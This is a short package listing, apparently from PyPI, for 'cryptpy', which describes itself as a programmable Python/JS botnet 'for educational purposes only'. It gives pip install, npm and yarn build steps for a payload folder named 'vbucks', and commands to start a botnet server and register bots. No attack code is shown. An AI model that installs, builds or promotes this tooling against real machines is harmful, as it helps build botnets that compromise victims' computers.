Dynamically programmable Python/JS botnet (educational purposes only).
Project description
Dynamically programmable Python botnet (educational purposes only).
Installation
Core Installation with PIP (botnet sources)
pip install cryptpy
Building the Node Source (GUI Implementation)
Note: requires installation of cryptpy
First, cd payload/vbucks
.
Build for MacOS:
-
npm i
-
yarn dist
Build for Windows:
-
npm i
-
npm run dist
Usage
Start a Server:
cryptpy --server --terminal
Start and Register a Bot:
cryptpy
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
cryptpy-0.3.3.tar.gz
(2.9 kB
view hashes)